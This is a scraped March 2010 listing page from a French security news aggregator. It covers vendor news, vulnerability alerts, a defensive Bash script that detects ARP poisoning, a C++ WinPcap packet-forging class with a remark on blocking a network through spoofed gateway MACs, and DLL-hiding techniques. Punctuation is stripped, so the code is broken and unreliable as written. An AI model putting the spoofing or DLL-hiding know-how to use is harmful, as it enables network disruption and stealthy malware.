http://www.secuobs.com/revue/news/199675.shtmlhttp://www.secuobs.com/revue/news/199675.shtml Secuobs.com : 2010-03-09 10:43:33 - Global Security Mag Online - Neocoretech, éditeur de solutions de virtualisation du poste de travail, présente la version 2 de sa plate-forme NDV Neocoretech Desktop Virtualisation est un système logiciel complet de virtualisation des postes de travail, qui permet à une organisation de rationnaliser la gestion de son parc PC centralisation des composants logiques, gestion du cycle de vie des postes de travail, optimisation de l'utilisation des ressources, accès simplifié à un PC virtuel sécurisé, accès à un portail de PC - Produits http://www.secuobs.com/revue/news/199674.shtmlhttp://www.secuobs.com/revue/news/199674.shtml Secuobs.com : 2010-03-09 01:23:44 - Criminalités numériques - Aujourd hui c est le Parisien qui répète les mêmes erreurs contre lesquelles j avais averti mes lecteurs le 7 février dernier et qu avait commises M6 ce soir-là On peut lire dans l article du Parisien du 8 mars 2010, qui est inclus dans un dossier sur les outils d espionnage des téléphones portables Interdit à l usage, pas à la vente Un http://www.secuobs.com/revue/news/199556.shtmlhttp://www.secuobs.com/revue/news/199556.shtml Secuobs.com : 2010-03-08 22:47:18 - Journal du Net Solutions l'actualité en bref - Le serveur qui héberge le site gouvernemental du passeport pour l'économie numérique a été piraté la semaine dernière par de http://www.secuobs.com/revue/news/199470.shtmlhttp://www.secuobs.com/revue/news/199470.shtml Secuobs.com : 2010-03-08 22:33:53 - Global Security Mag Online - A partir des années 90, les administrations publiques s'orientent vers des solutions électroniques ou le e-Gouvernement Ces solutions permettent à terme de rendre les services administratifs plus accessibles aux usagers et d'améliorer les fonctionnements internes Dans ce contexte, la Gendarmerie Nationale décide fin 2009 de sécuriser l'accès à ses postes de travail par l'utilisation d'une carte, d'un lecteur sécurisé et d'une application Web de gestion des cartes Depuis juin 2008, la Gendarmerie - Marchés http://www.secuobs.com/revue/news/199469.shtmlhttp://www.secuobs.com/revue/news/199469.shtml Secuobs.com : 2010-03-08 21:52:37 - Lilxam - Salut Récemment j ai lu un post d Ivanlef0u LdrpHashTable dans lequel il montre comment cacher une dll de cette table En lisant ce post on peut dire que nous connaissons 4 techniques pour cacher une dll Unlink de InLoadOrderModuleList Unlink de InMemoryOrderModuleList Unlink de InInitializationOrderModuleList Unlink de LdrpHashTable Mon but est donc de vous montrer une nouvelle méthode Cette http://www.secuobs.com/revue/news/199458.shtmlhttp://www.secuobs.com/revue/news/199458.shtml Secuobs.com : 2010-03-08 20:35:03 - Global Security Mag Online - Chaque semaine les consultants du CERT-XMCO analysent et synthétisent les faits marquants de la semaine Semaine chargée pour les cyberpirates et Microsoft Après la fermeture de nombreux noms de domaine associés au botnet Waledac par Microsoft, les autorités américaines et espagnoles se sont attaquées aux dirigeants de Mariposa , un réseau de zombies estimé à plus de 13 millions de machines Le géant de Redmond a publié la mise à jour du correctif MS10-015 dont la distribution avait été - Vulnérabilités http://www.secuobs.com/revue/news/199423.shtmlhttp://www.secuobs.com/revue/news/199423.shtml Secuobs.com : 2010-03-08 20:35:03 - Global Security Mag Online - Synology Inc lance officiellement son micrologiciel DiskStation Manager 23 Synology DSM 23 Synology DSM 23 propose de nouvelles fonctionnalités telles que la gestion des volumes avec la nouvelle solution Synology Hybrid RAID SHR , l'assistant EZ-Internet, le cryptage de dossiers partagés, une application de surveillance pour iPhone , la sauvegarde vers le cloud grâce au service Amazon S3 et des versions améliorées de File Station, Surveillance Station, Photo Station et Audio Station Le - Produits http://www.secuobs.com/revue/news/199422.shtmlhttp://www.secuobs.com/revue/news/199422.shtml Secuobs.com : 2010-03-08 20:23:44 - Les derniers documents du CERTA. - Des vulnérabilités multiples dans les versions du serveur Apache de la branche 220, antérieures à la version 2215 permettent à un utilisateur malveillant d'exécuter du code à distance, ou de provoquer un déni de service http://www.secuobs.com/revue/news/199418.shtmlhttp://www.secuobs.com/revue/news/199418.shtml Secuobs.com : 2010-03-08 19:50:49 - L'Atelier.fr Toute l'actualité - La télévision connectée ouvre des perspectives pour les publicitaires, en permettant aux téléspectateurs d'acheter un produit depuis son poste Une initiative qui oblige du coup les professionnels à repenser leurs contenus IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199414.shtmlhttp://www.secuobs.com/revue/news/199414.shtml Secuobs.com : 2010-03-08 18:49:23 - Vigilance vulnérabilités publiques - Deux vulnérabilités ont été annoncées dans Lotus iNotes DWA, Domino Web Access http://www.secuobs.com/revue/news/199400.shtmlhttp://www.secuobs.com/revue/news/199400.shtml Secuobs.com : 2010-03-08 18:25:59 - L'Atelier.fr Toute l'actualité - La banque mobile réunit des acteurs très différents ne partageant pas toujours la même vision des choses Pourtant, un rapprochement est indispensable pour permettre au service de se développer durablement IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199399.shtmlhttp://www.secuobs.com/revue/news/199399.shtml Secuobs.com : 2010-03-08 17:41:44 - Global Security Mag Online - Armand Dietrich, le nouveau directeur commercial d'AdStore, a reconduit cette semaine le partenariat qui unissait déjà de longue date le distributeur à valeur ajoutée spécialisé dans la sécurité, la sauvegarde, le stockage et la récupération de données, à Norman, spécialiste des solutions proactives de sécurité du contenu Distributeur de la gamme Norman depuis 2003, AdStore propose déjà à ses utilisateurs une plateforme technologique de premier choix, assurant la protection des clients, des serveurs et des - Business http://www.secuobs.com/revue/news/199386.shtmlhttp://www.secuobs.com/revue/news/199386.shtml Secuobs.com : 2010-03-08 17:41:44 - Global Security Mag Online - NETGEAR, constructeur d'équipements de réseau, annonce une nouvelle famille de solutions de gestion de réseaux sans fil dans sa gamme ProSafe conçue pour répondre aux besoins des petites et moyennes entreprises et organisations comportant jusqu'à 1500 utilisateurs Premier ensemble de solutions sur le marché conçu spécifiquement pour les PME, la nouvelle famille NETGEAR va, pour la première fois, permettre aux entreprises de gérer leurs réseaux sans fil à partir d'un seul point, avec un schéma - Produits http://www.secuobs.com/revue/news/199385.shtmlhttp://www.secuobs.com/revue/news/199385.shtml Secuobs.com : 2010-03-08 17:41:44 - Global Security Mag Online - Après un audit réalisé en décembre 2009 par Afnor Certification, Locarchives, spécialiste de la gestion et de la conservation externalisée de documents, a obtenu le renouvellement de ses certifications NF Z 40-350 et ISO 9001 De bon augure pour 2010 et notamment pour la labellisation Tiers de Confiance délivrée par la FNTC et l'agrément de l'Etat pour répondre aux offres publiques NF Z 40-350 Prestations en archivage et gestion externalisée de documents sur support papier Locarchives, qui - Business http://www.secuobs.com/revue/news/199384.shtmlhttp://www.secuobs.com/revue/news/199384.shtml Secuobs.com : 2010-03-08 17:41:44 - Global Security Mag Online - FBI embeds cyber-investigators in Ukraine, Estonia Date 05 Mars 2010 Gravité Faible Description Espérant arrêter plus de cybercriminels, le FBI a commencé à exporter certains de ces agents en Estonie, en Ukraine et aux Pays-Bas Depuis quelques mois, des agents travaillent ainsi main dans la main avec les forces de l'ordre locales afin de mettre un terme à certains cybercrimes internationaux, a déclaré Jeffrey Troy, chef de la Cyber Division du FBI Ce type de coopération - Vulnérabilités http://www.secuobs.com/revue/news/199383.shtmlhttp://www.secuobs.com/revue/news/199383.shtml Secuobs.com : 2010-03-08 17:41:44 - Global Security Mag Online - Top Ten Web Hacking Techniques of 2009 Official Date 05 Mars 2010 Gravité Moyenne Description Dans le cadre de la présentation intitulée 2010 A Web Hacking Odyssey qu'a réalisé Jeremiah Grossman lors de la RSA Conference le 3 mars dernier, celui-ci a établi le top 10 des attaques web de l'année Afin d'établir ce classement, le chercheur a contacté un nombre important de spécialistes du domaine Le résultat est plus qu'impressionnant L'équipe a ainsi pu énumérer pas moins de 82 - Vulnérabilités http://www.secuobs.com/revue/news/199382.shtmlhttp://www.secuobs.com/revue/news/199382.shtml Secuobs.com : 2010-03-08 17:41:44 - Global Security Mag Online - Pour la 2ème année consécutive, DOCUMATION organise, en partenariat avec FedISA Fédération de l'ILM, du Stockage et de l'Archivage un concours dans le champ de la dématérialisation Ces Awards sont destinés à récompenser des produits logiciel ou matériel , services ou procédures relatifs au domaine de la gestion du document dans tout son cycle de vie, dans les environnements privé et public, en France et à l'étranger Par dématérialisation, on parle ici de son sens le plus large, c'est à dire la mise - Business http://www.secuobs.com/revue/news/199381.shtmlhttp://www.secuobs.com/revue/news/199381.shtml Secuobs.com : 2010-03-08 17:41:44 - Global Security Mag Online - Novell Inc et la Cloud Security Alliance CSA , ont annoncé une initiative visant à instaurer le premier programme de certification, d'éducation et de sensibilisation à la sécurité du cloud computing Baptisé Trusted Cloud Initiative, ce programme a pour objectif d'aider les fournisseurs de cloud à développer des pratiques sécurisées et interopérables pour la gestion d'identité, d'accès et de conformité Désormais, les entreprises qui envisagent d'adopter le cloud computing pourront se baser sur une norme - Business http://www.secuobs.com/revue/news/199380.shtmlhttp://www.secuobs.com/revue/news/199380.shtml Secuobs.com : 2010-03-08 17:19:33 - L'Atelier.fr Toute l'actualité - Purdue a mis au point un boîtier qui convertit des pulsations laser ultra rapides en signaux à radiofréquences Cela permet de transférer sans fils et sans interférences un grand nombre d'informations IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199371.shtmlhttp://www.secuobs.com/revue/news/199371.shtml Secuobs.com : 2010-03-08 16:31:54 - Global Security Mag Online - LANDesk Software, éditeurs de solutions de gestion des systèmes, de la sécurité et des services IT, annonce la certification de sa solution LANDesk Service Desk par Pink Elephant pour les 14 processus qui forment le référentiel mondial ITIL V3 Cette bibliothèque recense les meilleures pratiques existantes dans les domaines du support et des services informatiques Troisième entreprise au monde à proposer un produit qui répond aux 14 processus étudiés par Pink Verify, LANDesk s'appuie sur son offre - Produits http://www.secuobs.com/revue/news/199355.shtmlhttp://www.secuobs.com/revue/news/199355.shtml Secuobs.com : 2010-03-08 16:31:54 - Global Security Mag Online - Stonesoft, fournisseur de solutions intégrées de sécurité réseau et de continuité de service, annonce son nouveau partenariat avec Overlap Groupe, Partenaire d'IBM et HP en France, expert en intégration de solutions serveurs et stockage, middleware et réseaux qui emploie 500 personnes et a dégagé un chiffre d'affaire sur l'exercice 2008 2009 de 230 millions d'euros Les deux sociétés se sont notamment rejointes dans leurs approches communes des Grands Comptes La volonté de développer des Services Managés - Business http://www.secuobs.com/revue/news/199354.shtmlhttp://www.secuobs.com/revue/news/199354.shtml Secuobs.com : 2010-03-08 16:13:41 - L'Atelier.fr Toute l'actualité - L'âge d'or et bleu - des projets de modernisation d'applications IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199352.shtmlhttp://www.secuobs.com/revue/news/199352.shtml Secuobs.com : 2010-03-08 15:27:43 - Global Security Mag Online - ITrust organise le mardi 30 mars un séminaire à Toulouse où il recevra dans un des salons de la prestigieuse enceinte Ernest Wallon du Stade Toulousain PROGRAMME 8h15 Accueil, café 8h30 Panorama de la Cybercriminalité en 2009 Les menaces 2010 inattendues inspirées de l'avènement du Cloud Réagir vite et bien dans l'urgence d'une attaque 8h50 Les risques juridiques majeurs issus des phénomènes de cybercriminalité Se couvrir - ÉVÉNEMENTS http://www.secuobs.com/revue/news/199344.shtmlhttp://www.secuobs.com/revue/news/199344.shtml Secuobs.com : 2010-03-08 15:27:43 - Global Security Mag Online - Comment sécuriser les accès aux applications dans un environnement hétérogène en prenant en compte les spécificités liées aux métiers du monde de la finance La sécurité ne doit pas être assurée de manière générique, elle doit s'adapter aux risques fonctionnels Les cadres règlementaires sont également étroitement liés aux métiers Les outils doivent intégrer cette dimension essentielle et s'adresser davantage aux utilisateurs Ainsi, un administrateur n'aura pas les mêmes besoins qu'un employé d'agence, ce - ÉVÉNEMENTS http://www.secuobs.com/revue/news/199343.shtmlhttp://www.secuobs.com/revue/news/199343.shtml Secuobs.com : 2010-03-08 13:54:21 - L'Atelier.fr Toute l'actualité - Les médias sociaux ne sont plus l'apanage des jeunes générations - Flavors, aggrégateur de réseaux sociaux - Créateurs de mode défilé en 3D - userADgents étudie l'App Store France d'Apple - Flexo, les cours en ligne s'adapte au niveau et aux appareils de l'utilisateur - Les élus sur Internet une utilisation pas assez intéractive - Invest in America, alliance d'investisseurs pour de jeunes entrepreneurs - Sécurité et confidentialité rendent les utilisateurs frileux au portefeuille mobile - Google détrône Facebook - L'appli Tag Heuer - Majic Wheels, la voiture qui grimpe partout - Madagascar - La politique s'empare des média sociaux Pourquoi - Madagascar - Start-up Cavissima - Mentor graphix, défi entre consommation et vitesse - ST Microelectronics, spécialiste de la conception de puce électronique - NTT DoCoMo le retour - Bamboudesign - Les Français bientôt invités à choisir leur navigateur sous Windows - HTML5 - L'App Store censure 5 000 applications sexuellement inappropriées - Twitter et l'argent - Problème IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199323.shtmlhttp://www.secuobs.com/revue/news/199323.shtml Secuobs.com : 2010-03-08 13:54:21 - L'Atelier.fr Toute l'actualité - Le secteur high-tech améliore la productivité de nombreux secteurs Mais il est encore trop petit pour que l'on mise exclusivement dessus pour renouer avec la croissance IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199322.shtmlhttp://www.secuobs.com/revue/news/199322.shtml Secuobs.com : 2010-03-08 12:58:36 - Global Security Mag Online - Bee Ware, éditeur de solutions de sécurité informatique, annonce la nomination de Marc Vaillant au poste de Président Directeur Général Expert reconnu sur le marché de la sécurité informatique, Marc Vaillant aura pour principales missions de piloter la stratégie de Bee Ware et d'accélérer le développement de ses parts de marché en France et à l'international Pour ce faire, il définira les orientations de la société et insufflera une nouvelle dynamique auprès des différentes équipes Depuis le début de - Business http://www.secuobs.com/revue/news/199304.shtmlhttp://www.secuobs.com/revue/news/199304.shtml Secuobs.com : 2010-03-08 11:46:34 - Global Security Mag Online - Citrix Systems Inc, fournisseur de technologies de virtualisation, de mise en réseau et de solutions Cloud Computing, renforce son équipe dirigeante en Europe du Sud avec la nomination d'Eric Lecoq au poste nouvellement créé de directeur général France Fort d'une expérience de plus de 20 ans dans le monde de l'édition de logiciels, dont 8 en tant que directeur commercial puis directeur général de BMC Software France, Eric Lecoq, 45 ans, sera en charge de la stratégie et du développement commercial de - Business http://www.secuobs.com/revue/news/199293.shtmlhttp://www.secuobs.com/revue/news/199293.shtml Secuobs.com : 2010-03-08 11:41:31 - CNIS mag - Il y a quelques mois Verizon décidait de publier régulièrement des statistiques sérieuses sur l état des menaces informatiques Des statistiques qui se veulent moins marketing qu indicateurs de risques en presque temps réel Mais bien que publiant, en début d ouvrage, les méthodologies d échantillonnage ayant servies à l établissement de ces métriques, il planait toujours un doute sur http://www.secuobs.com/revue/news/199292.shtmlhttp://www.secuobs.com/revue/news/199292.shtml Secuobs.com : 2010-03-08 11:41:31 - CNIS mag - L un des domaines les plus épargnés par la crise semble être celui des statistiques sur la sinistralité informatique Ce mortier avec lequel l industrie de la cyberprotection fait des affaires prend, ces temps-ci, des airs de requiem Les sites Web dangereux, par exemple, ont vu leur nombre croître de 182pourcents nous affirme une étude de MessageLabs http://www.secuobs.com/revue/news/199291.shtmlhttp://www.secuobs.com/revue/news/199291.shtml Secuobs.com : 2010-03-08 11:23:12 - L'Atelier.fr Toute l'actualité - Provoquer une panne fugitive de l'ordinateur pendant le processus d'authentification d'un module sécurisé rend le système vulnérable Et facilite la récupération de la clé qui les sécurise IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199288.shtmlhttp://www.secuobs.com/revue/news/199288.shtml Secuobs.com : 2010-03-08 01:03:36 - cloud's Blog - Quand on a l'habitude de se connecter à des réseaux publics, qu'on est un admin consciencieux ou qu'on est tout simplement un peu parano, il faut s'assurer que nous ne sommes pas victimes d'une attaque Man in the Middle Je ne vais pas ici vous faire un cours d'arp spoofing car Google vous renseignera parfaitement sur ce sujet J'ai par contre voulu développer un script Bash au doux nom d'ARP Poisoning Guardian surveillant mes tables ARP et m'indiquant si je suis victime d'une attaque et quand celle ci s'arrète J'aurais également pu faire un système qui ajoute automatiquement la passerelle en statique mais c'est quand meme plus sympa de savoir si on est victime d'une attaque pour pouvoir remonter jusqu'au petit malin Quand une attaque est détectée, le script vous donne l'adresse MAC du pirate et vous propose tout de meme d'ajouter la bonne entrée statique pour vous protéger L'utilisation est très simple arprotecsh -ip Voici maintenant le script que j'ai codé sous FreeBSD Celui ci devrait également fonctionner sous Linux en modifiant le chemin de Bash usr local bin bash echo ARP Poisoning Guardian by cloud echo website http blogmadpowahorg echo ----- help echo Usage arprotecsh -ip exit if -lt 2 then help exit fi if -ip 1 then ip_gw 2 else help exit fi arp -a arpfile while read line_arp do ip echo line_arp cut -d ' ' -f2 cut -d ' ' -f2 cut -d ' ' -f1 if ip ip_gw then mac_gw echo line_arp cut -d ' ' -f4 fi done IP ip_gw MAC mac_gw echo Now starting echo attack 0 while 42 -eq 42 do arp -a arpfile while read line_arp do ip echo line_arp cut -d ' ' -f2 cut -d ' ' -f2 cut -d ' ' -f1 if ip ip_gw then mac_gw_new echo line_arp cut -d ' ' -f4 if mac_gw_new mac_gw then if attack -ne 1 then heure date cut -d ' ' -f5 echo heure ARP Poisoning detected echo heure MAC Attacker mac_gw_new echo heure You should add a static arp entry typing arp -s ip_gw mac_gw echo attack 1 fi else if attack -ne 0 then heure date cut -d ' ' -f5 echo heure Attack seems stopped echo attack 0 fi fi fi done ARP Poisoning Guardian by cloud website http blogmadpowahorg ----- IP 1921680254 MAC 00 07 ca 3c 8e d8 Now starting 23 23 15 ARP Poisoning detected 23 23 15 MAC Attacker 00 1c f0 9e 3f 4a 23 23 15 You should add a static arp entry typing arp -s 1921680254 00 07 ca 3c 8e d8 23 25 09 Attack seems stopped http://www.secuobs.com/revue/news/199211.shtmlhttp://www.secuobs.com/revue/news/199211.shtml Secuobs.com : 2010-03-08 00:09:32 - Criminalités numériques - Régulièrement la presse en ligne se fait l écho de l exploitation des événements de l actualité par les délinquants Deux articles du 4 et du 5 mars derniers sur le blog de F-Secure ont attiré mon attention Ils décrivent quelques techniques utilisées pour amener de futures victimes à télécharger de faux antivirus Dans les deux cas décrits, les http://www.secuobs.com/revue/news/199184.shtmlhttp://www.secuobs.com/revue/news/199184.shtml Secuobs.com : 2010-03-08 00:09:32 - Criminalités numériques - Et voici déjà le 100ème article de ce blog, commencé seulement le 30 octobre 2008, par cet article sur les nouveaux défis de la délinquance numérique pour France 2025 Près de 30000 visionnements vraisemblablement franchis au cours de la journée du lundi 8 mars 2010 , 156 commentaires Merci à tous Et n hésitez pas à lire, http://www.secuobs.com/revue/news/199183.shtmlhttp://www.secuobs.com/revue/news/199183.shtml Secuobs.com : 2010-03-07 23:23:52 - Geo's blog - On continue sur la lancée Lors de mon article précédent, je montrais comment il était possible d'énumérer les interfaces réseau disponible sur ma bécane http geo0wblogspotcom 2010 03 analyse-de-winpcap-partie-ihtml Il se trouve qu'on avait des résultats un peu bluffant puisque ça parle pas forcément Heureusement, quand on chopait la description de l'interface réseau, ça allait mieux Pour qu'on ne se prenne plus la tête avec tout ça, j'ai décidé d'encapsuler les fonctionnalités que je détaillerais dans une classe C Donc, pour le moment, on a une fonction statique qui renvoie un double vecteur de chaînes de caractères avec la chaîne représentant l'interface, l'autre représentant la description On a aussi un constructeur qui prend en argument une interface réseau à ouvrir via CreateFile et qui va récupérer sa description ainsi que d'autres infos comme son adresse IP, le masque de sous-réseau et la passerelle par défaut Par contre, j'ai testé sur le Windows Vista de ma copine, ça marche pas Putain de bordel de merde, quoi Bref, on va passer en revue ma classe que j'ai nommée WinGPacket Le nom est pourri mais je savais pas comment la baptiser Win pour Windows, G pour la première lettre de mon pseudo, et Packet car ça manipule les paquets réseau Bref, on s'en fout wingpackethpp ifndef _WINGPACKET_HPP define _WINGPACKET_HPP include include include include include stringhpp class Wingpacket public Wingpacket char NULL Wingpacket static std vector getAllInterfaces char getDescription const char getIPAddress const char getSubnetMask const char getDefaultGateWay const int sendPacket char packet, int size const private String m_description String m_ipAddr, m_subnetMask, m_defaultGateWay HANDLE m_hDevice endif En quelques mots on met des défines pour éviter de se faire couillonner si y'a des inclusions multiples On a aussi les accesseurs aux principaux membres qui sont des objets non pas de type string mais de type String , ce qui change tout C'est une classe que j'ai refaite dans le cadre de mes études et je me suis dit que je pourrais la garder Mais ce qui reste le plus intéressant, c'est la fonction au prototype suivant int sendPacket char packet, int size const Elle prend en argument un pointeur sur notre tableau de caractères qui correspond à notre packet en dur, ainsi que sa taille Effectivement, on n'ira pas mesurer la taille du paquet avec strlen puisqu'il y a des octets nuls dedans Et le plus impressionnant son code Vous êtes prêts int Wingpacket sendPacket char packet, int size const DWORD dwBytesWritten return WriteFile this-m_hDevice, packet, size, dwBytesWritten, NULL Eh oui, un simple WriteFile suffit à balancer notre paquet sur le réseau Quand on sniffe avec WireShark, on les voit tranquillement défiler Notre handle correspond à une poignée sur notre interface réseau qui est ouverte dans le constructeur de la manière suivante String strDeviceName deviceName if strDeviceNamesubstr 0, 8 Device String newName Global NPF_ newName strDeviceNamesubstr 8 String tmpPathKey On essaie d'ouvrir le driver this-m_hDevice CreateFile newNamegetStr , GENERIC_READ GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, 0 Je fais face à un problème je préfixe la chaîne passée en paramètre formel à ma méthode qui correspond à l'interface réseau, de la forme Visiblement, je préfixe cette chaîne de Global NPF_ et J'aurais du mal à vous dire ce à quoi correspond NPF_ Je peux juste vous dire qu'il existe un driver sous ce nom Parfois, il arrive qu'il faille que j'enlève ce préfixe, sans quoi l'envoi de paquets ne marche pas Eh oui, à cause de mon manque de patience et de compétences, j'ai pas tout trouvé ce que je cherchais dans les sources de winpcap Donc il reste des points à éclaircir Ce qu'il faut véritablement retenir, c'est qu'il suffise que d'un WriteFile pour balancer un paquet forgé entièrement à la main à travers le réseau Allez, un petit exemple de code qui fonctionne chez moi mais, malheureusement, pas chez tout le monde et peut-être pas chez vous include include stringhpp include wingpackethpp using namespace std int main vector Devices Wingpacket getAllInterfaces for unsigned int i 0, l Devicessize i choice while choice Devicessize cout choice Wingpacket myDevice Devices choice-1 0 cout WinGPacketexe 1 Device C8B3A563-AC0B-4871-9A3B-9EF6DB42EC87 2 Device F9A79020-32A7-4134-BD12-C92351E25EC4 3 Device NdisWanIp 4 Device 8EEB3BBC-655E-4E05-A2DD-92A5325081A6 Belkin Wireless G Plus MIMO USB Network Adapter 5 Device 79ACFCBD-A8D5-40EE-B565-3AA5D78D34B5 6 Device 70467207-74FE-4F20-87EB-5F79C03C2D2A 7 Device NdisWanBh 8 Device F9415153-9262-4C55-B0A4-D9D3B9911CB7 Realtek PCIe FE Family Controller Select the interface to open Un invite de saisie où je rentre le numéro d'une interface qui me parle, c'est-à-dire qui possède une description Ici, ça sera 4 car je bosse avec ma clé USB Wifi Select the interface to open 4 Description is Belkin Wireless G Plus MIMO USB Network Adapter IP address is 19216813 Subnet Mask is 2552552550 DefaultGateWay is 19216811 Super, il m'affiche la configuration de ma clé wifi, malheureusement chopée dans le registre et non à l'aide d' IoControlCode Bon, je suis sûr de rien, mais je suis persuadé qu'il soit possible de récupérer ce telles informations via un DeviceIoControl Mais avant, je prends bien soin d'ouvrir WireShark et de capturer les paquets en mode non promiscuous exceptionnellement pour cette interface car sinon ça ne fonctionne pas et je mate ce qui se passe Et là IMAGE Cliquez sur l'image pour agrandir On voit nos paquets passer, l'air de rien Bon, heureusement, j'ai mis de la merde quant aux adresses MAC Mais si on fout vraiment n'importe quoi, on peut bloquer entièrement le réseau dire à tout le monde que la passerelle par défaut se situe à une adresse MAC foireuse, ça fait mal et ça empêche tout le monde de passer Effet garanti Conclusion Envoyer nos propres paquets sur le réseau s'avère, avec le recul, vraiment simple Ce qui est plus dur et ce sur quoi je ne me suis pas encore attardé gérer des connexions TCP IP avec ces paquets, par exemple Et plus encore si affinité Heureusement, il y a les rfc A retenir WriteFile permet l'envoi de paquets sur une interface réseau ouverte avec CreateFile Et comme promis, une archive contentant le programme de test, les sources et le fichier projet Code Blocks http venom630freefr geo blog pcap WinGPacketzip Et, enfin, si par hasard vous avez des réponses à mes interrogations, je suis entièrement preneur car je compte vraiment faire quelque chose de concret avec tout ça A vrai dire, faire un fork de pcap m'intéresserait car j'aurais juste des h et cpp à me trimballer des fichiers sources dont je connais et maîtrise le contenu plutôt que des dll et plein d'autres dépendances Geo PS Ivan, je me suis mis aux chocapics http://www.secuobs.com/revue/news/199178.shtmlhttp://www.secuobs.com/revue/news/199178.shtml Secuobs.com : 2010-03-07 18:45:44 - Criminalités numériques - Deux articles du 4 et du 5 mars derniers sur le blog de F-Secure ont attiré mon attention Ils décrivent quelques techniques utilisées pour amener de futures victimes à télécharger de faux antivirus Dans les deux cas décrits, les moteurs de recherche Google en l espèce sont abusés pour référencer les documents qui vont piéger leurs victimes http://www.secuobs.com/revue/news/199153.shtmlhttp://www.secuobs.com/revue/news/199153.shtml Secuobs.com : 2010-03-07 12:48:21 - Vigilance vulnérabilités publiques - Un attaquant peut provoquer un buffer overflow ou modifier les enregistrements de PowerDNS Recursor http://www.secuobs.com/revue/news/199103.shtmlhttp://www.secuobs.com/revue/news/199103.shtml Secuobs.com : 2010-03-06 22:01:03 - Prox IA Securite des Applications WEB - Il y a quelques années un serveur PXE permettant le boot sur le réseau pouvait être utilisé pour prendre la main sur une machine cible que l on faisait booter sur une image fournie par notre serveur PXE pirate pour accéder aux informations de la machine cible Mais de l eau est passée sous le pont de la sécurité et aujourd hui un LiveCD ou une clef USB permettent beaucoup plus simplement d accéder aux informations d une machine cible Il n est même pas nécessaire de voler votre PC car quelques minutes suffisent pour faire son marché dans vos données privées Comment Il faut faire booter la machine cible sur le LiveCD ou la clef USB, et généralement, et ce dans le pire des cas, le pirate se contente d accéder aux données privées de l utilisateur S il a plus de chance il a aussi la possibilité d'infecter votre machine La parade à ce type d attaque consiste habituellement à mettre en place une authentification de l utilisateur avant le boot de la machine cible appelé pre-boot authentication Microsoft avec Bitlocker, et bien d autres encore, propose ce type de solution Dans un prochain article nous aurons l occasion de parler de ces solutions Mais revenons à notre serveur PXE A quoi donc peut-il bien servir Eh bien, j ai retrouvé dans mes cartons un vieux PC portable sans CDROM et ne proposant pas le boot sur clef USB Or ce vieux PC, en Windows 98, ne demandait rien de mieux qu une petite mise à jour Et c est dans ce contexte que le serveur PXE intervient Il existe de nombreux blogs qui traitent de ce problème qui ne date pas d hier Mais devant les petites difficultés agaçantes que j ai rencontrées pour mettre en place cette solution, j ai pensé qu il serait opportun de les partager Quel est notre objectif Nous souhaitons permettre à notre vieux PC de booter sur un serveur pour permettre l accès à un CD d installation de Windows XP pour mettre à jour notre vielle machine De quoi avons-nous besoin Premièrement nous avons besoin d une image sur laquelle nous allons booter Cette image contient les outils nécessaires pour permettre l accès à notre CD d installation de Windows XP Deuxièmement nous avons besoins d un serveur PXE avec son serveur DHCP ainsi notre vielle machine peut récupérer une adresse IP et se connecter à notre serveur pour booter sur l image que nous avons créée Voici les différentes étapes nécessaires à la mise à jour de notre vielle machine 1 Vous pouvez créer votre propre image avec l outil WinImage ou bien vous pouvez récupérer une image prête à l emploi Je vous conseille personnellement d utiliser l image existante et de la copier sous C PXE 1 Lors du boot l utilisateur peut choisir de booter sur sa vielle machine en local ou sur l image présente sur le réseau Il est pour cela nécessaire de créer un menu PXE La création de ce menu se fait avec l outil ImgEdit de la façon suivante 1 Lancer ImgEdit 2 Choisir Create a PXE menu boot file 3 Ajouter notre image pour permettre le boot sur celle-ci 4 Ajouter l option Hard drive pour permettre le boot local 5 Sauvegarder sous C PXE mbapxe 6 Choisir Edit an existing file et sélectionner notre image précédemment sauvegardée sous C PXE 7 Sélectionner Properties puis Change et activer les paramètres suivants TCP IP, Pre-OS et Writable 1 Configurer et lancer TFTP n oubliez pas de vous assurer qu un firewall mal configuré ne bloque pas l accès au serveur PXE Pour information, dans notre cas, le serveur PXE est un Windows XP SP2 1 Lancer TFTP 2 Choisir Settings 1 Base directory C PXE 2 TFTP server activé 3 TFTP client activé 4 DHCP server activé 3 Choisir l onglet DHCP server 1 IP pool starting address 19216812100 2 Size of pool 10 3 Boot file mbapxe 4 Additional option 66 19216812100 1 Partager le CDROM du serveur en lui donnant le nom sharedcdrom et y insérer le CD d installation de Windows XP 1 Booter la vielle machine sur notre image proposée par le serveur PXE l image est chargée avec tous les outils nécessaires, en particulier les accès réseau et lancer les commandes suivantes lorsque le prompt est affiché serveur est le nom de votre serveur PXE, sharedcdrom est le nom du partage de votre CDROM 1 net view serveur 2 net use z serveur sharedcdrom 3 z 4 cd i386 5 winnt L installation de Windows XP se lance Votre vielle machine est sur le point de rajeunir Note dans notre configuration le serveur PXE a un compte Administrator sans mot de passe Note si vous avez des problèmes pour télécharger ou utiliser les outils nécessaires n hésitez pas à me contacter Source le blog de Didier Stevens et The Bit Bucket Tags Technorati Tags attaque,sécurité,protocole,faille - delicious Tags attaque,sécurité,protocole,faille - BuzzNet Tags attaque,sécurité,protocole,faille http://www.secuobs.com/revue/news/199025.shtmlhttp://www.secuobs.com/revue/news/199025.shtml Secuobs.com : 2010-03-06 11:39:49 - Vigilance vulnérabilités publiques - Un attaquant local peut employer virtio_console, afin de mener un déni de service dans hvc_console http://www.secuobs.com/revue/news/198945.shtmlhttp://www.secuobs.com/revue/news/198945.shtml Secuobs.com : 2010-03-06 10:54:21 - Bruno Kerouanton - As most readers of this blog know, I spend part of my time teaching IT security for different people, from initiation and basics to post-master s degree education For 2010, I ll be giving more than two full weeks of training, not including conferences, articles and papers That means one of my duties is to stay well http://www.secuobs.com/revue/news/198944.shtmlhttp://www.secuobs.com/revue/news/198944.shtml Secuobs.com : 2010-03-06 02:33:13 - Global Security Mag Online - OTIKA distributeur à valeur ajoutée, expert en solutions de sécurité et optimisation réseau, annonce l'arrivée de Stéphane Davaudet au sein de l'équipe commerciale Expert depuis plus de trois ans dans le développement de marques à fort potentiel, telles que Juniper Networks et Trend Micro Stéphane Davaudet sera exclusivement dédié au développement de la marque 